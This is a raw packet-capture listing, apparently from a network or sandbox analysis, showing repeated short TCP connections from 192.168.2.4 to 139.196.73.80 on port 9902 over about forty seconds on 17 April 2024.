Apr 17, 2024 07:06:58.110717058 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110724926 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110742092 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110747099 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110759020 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110774040 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110785007 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110789061 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110805035 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110805988 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110821009 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110836983 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110852957 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110862017 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110868931 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110882044 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110884905 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110901117 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110917091 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110918045 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110935926 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110937119 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110951900 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110968113 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110971928 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110984087 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111000061 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111008883 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111016035 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111032009 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111046076 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111047983 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111063957 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111078978 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111093044 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111093998 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111109972 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111113071 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111125946 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111140966 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111156940 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111157894 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111172915 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111176968 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111188889 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111201048 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111205101 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111221075 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111221075 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111236095 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111252069 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111267090 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111267090 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111283064 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111299038 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111306906 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111315012 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111330032 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111334085 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111351967 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.111373901 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111373901 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.111512899 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.117376089 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.126401901 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.464180946 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.478174925 CEST	9902	49731	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.478338003 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.478607893 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.204116106 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.551388025 CEST	9902	49731	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:59.554333925 CEST	9902	49731	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:59.554363966 CEST	9902	49731	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:59.554425955 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.554611921 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.554611921 CEST	49731	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.674863100 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:59.898683071 CEST	9902	49731	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:00.688559055 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.030648947 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:01.030898094 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.030991077 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.368660927 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:01.371771097 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:01.371789932 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:01.371963978 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.371963978 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.372061014 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.486124992 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.834299088 CEST	9902	49733	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:01.834373951 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:01.834573984 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.052784920 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.052864075 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.183484077 CEST	9902	49733	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.187839031 CEST	9902	49733	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.187856913 CEST	9902	49733	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.188071012 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.188071966 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.188126087 CEST	49733	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.298506021 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.376043081 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.533638000 CEST	9902	49733	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.634522915 CEST	9902	49734	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.634764910 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.634912968 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.968910933 CEST	9902	49734	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.972457886 CEST	9902	49734	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.972496986 CEST	9902	49734	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:02.972520113 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.972568989 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:02.972646952 CEST	49734	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.079863071 CEST	49735	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.304719925 CEST	9902	49734	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:03.429384947 CEST	9902	49735	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:03.429610014 CEST	49735	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.429785967 CEST	49735	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.758702040 CEST	9902	49735	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:03.761327982 CEST	9902	49735	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:03.761342049 CEST	9902	49735	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:03.761416912 CEST	49735	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.761693954 CEST	49735	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:03.876765966 CEST	49736	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.102525949 CEST	9902	49735	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.214937925 CEST	9902	49736	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.215065002 CEST	49736	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.215245962 CEST	49736	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.360533953 CEST	49732	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.550406933 CEST	9902	49736	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.553028107 CEST	9902	49736	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.553042889 CEST	9902	49736	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.553231001 CEST	49736	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.553307056 CEST	49736	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.658044100 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.687918901 CEST	9902	49732	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.876997948 CEST	9902	49736	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.974455118 CEST	9902	49737	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:04.974649906 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:04.974793911 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.291050911 CEST	9902	49737	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:05.294486046 CEST	9902	49737	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:05.294501066 CEST	9902	49737	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:05.294538975 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.294619083 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.294719934 CEST	49737	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.407835007 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.611181974 CEST	9902	49737	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:05.739506960 CEST	9902	49738	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:05.739598989 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:05.739805937 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.075675011 CEST	9902	49738	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.076807976 CEST	9902	49738	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.076839924 CEST	9902	49738	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.076910019 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.076997042 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.077069998 CEST	49738	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.189074993 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.409001112 CEST	9902	49738	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.538629055 CEST	9902	49739	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.538748980 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.538966894 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.867372990 CEST	9902	49739	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.869868040 CEST	9902	49739	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.869913101 CEST	9902	49739	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:06.869999886 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.870040894 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.870284081 CEST	49739	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:06.991345882 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.220274925 CEST	9902	49739	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:07.326455116 CEST	9902	49740	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:07.326613903 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.326848984 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.660284996 CEST	9902	49740	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:07.663151979 CEST	9902	49740	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:07.663167953 CEST	9902	49740	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:07.663244009 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.663244009 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.666544914 CEST	49740	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:07.782820940 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.021447897 CEST	9902	49740	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.140947104 CEST	9902	49741	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.141064882 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.141271114 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.489815950 CEST	9902	49741	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.493603945 CEST	9902	49741	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.493654013 CEST	9902	49741	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.493695021 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.493746042 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.493913889 CEST	49741	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.595504999 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.831506014 CEST	9902	49741	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.924217939 CEST	9902	49742	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:08.924424887 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:08.924618006 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.267960072 CEST	9902	49742	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:09.270562887 CEST	9902	49742	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:09.270603895 CEST	9902	49742	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:09.270675898 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.270675898 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.270854950 CEST	49742	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.379887104 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.601327896 CEST	9902	49742	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:09.694628000 CEST	9902	49743	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:09.694955111 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:09.695252895 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.010159016 CEST	9902	49743	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.012763977 CEST	9902	49743	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.012814045 CEST	9902	49743	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.012824059 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.012864113 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.013020039 CEST	49743	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.126801968 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.327414036 CEST	9902	49743	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.464996099 CEST	9902	49744	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.465157032 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.465434074 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.791925907 CEST	9902	49744	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.795494080 CEST	9902	49744	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.795509100 CEST	9902	49744	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:10.795572996 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.795614004 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:10.974792004 CEST	49744	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:11.120991945 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:11.300775051 CEST	9902	49744	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:11.440701008 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:11.441005945 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:12.441203117 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:12.441414118 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:12.549341917 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:12.875242949 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:12.877871990 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:12.877888918 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:12.878062010 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:12.955091000 CEST	49745	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.083722115 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.277542114 CEST	9902	49745	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:13.425827026 CEST	9902	49746	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:13.426233053 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.473414898 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.812839031 CEST	9902	49746	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:13.815772057 CEST	9902	49746	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:13.815788984 CEST	9902	49746	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:13.815912962 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.815912962 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.816348076 CEST	49746	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:13.923402071 CEST	49747	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:14.155905962 CEST	9902	49746	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:14.938468933 CEST	49747	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:16.954272985 CEST	49747	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:20.972990036 CEST	49747	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:28.985328913 CEST	49747	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.095474005 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.409373999 CEST	9902	49753	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:35.409591913 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.409679890 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.725055933 CEST	9902	49753	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:35.733340979 CEST	9902	49753	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:35.733357906 CEST	9902	49753	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:35.733628988 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.733629942 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.733629942 CEST	49753	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:35.846131086 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.047728062 CEST	9902	49753	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.156291008 CEST	9902	49754	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.156418085 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.156630993 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.467232943 CEST	9902	49754	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.470002890 CEST	9902	49754	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.470021009 CEST	9902	49754	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.470069885 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.470120907 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.470278025 CEST	49754	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.579729080 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.780375957 CEST	9902	49754	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.893368959 CEST	9902	49755	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:36.893460989 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:36.893651009 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.205091000 CEST	9902	49755	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:37.208169937 CEST	9902	49755	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:37.208188057 CEST	9902	49755	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:37.208353996 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.208353996 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.208446980 CEST	49755	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.314208031 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.520106077 CEST	9902	49755	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:37.658665895 CEST	9902	49756	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:37.658788919 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:37.659017086 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.005635977 CEST	9902	49756	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.009232998 CEST	9902	49756	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.009252071 CEST	9902	49756	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.009287119 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.009325981 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.009545088 CEST	49756	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.110807896 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.352493048 CEST	9902	49756	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.430705070 CEST	9902	49757	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.430877924 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.430969954 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.746767998 CEST	9902	49757	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.749429941 CEST	9902	49757	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.749449968 CEST	9902	49757	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:38.749536037 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.749675989 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.749675989 CEST	49757	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:38.860879898 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.068041086 CEST	9902	49757	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.178271055 CEST	9902	49758	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.178361893 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.178682089 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.498584986 CEST	9902	49758	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.502971888 CEST	9902	49758	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.502991915 CEST	9902	49758	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.503181934 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.503181934 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.503231049 CEST	49758	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.611388922 CEST	49759	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.821484089 CEST	9902	49758	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.964905024 CEST	9902	49759	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:39.965240955 CEST	49759	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:39.965425968 CEST	49759	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:40.313803911 CEST	9902	49759	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:40.316447020 CEST	9902	49759	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:40.316464901 CEST	9902	49759	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:40.316636086 CEST	49759	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:40.316802025 CEST	49759	9902	192.168.2.4	139.196.73.80
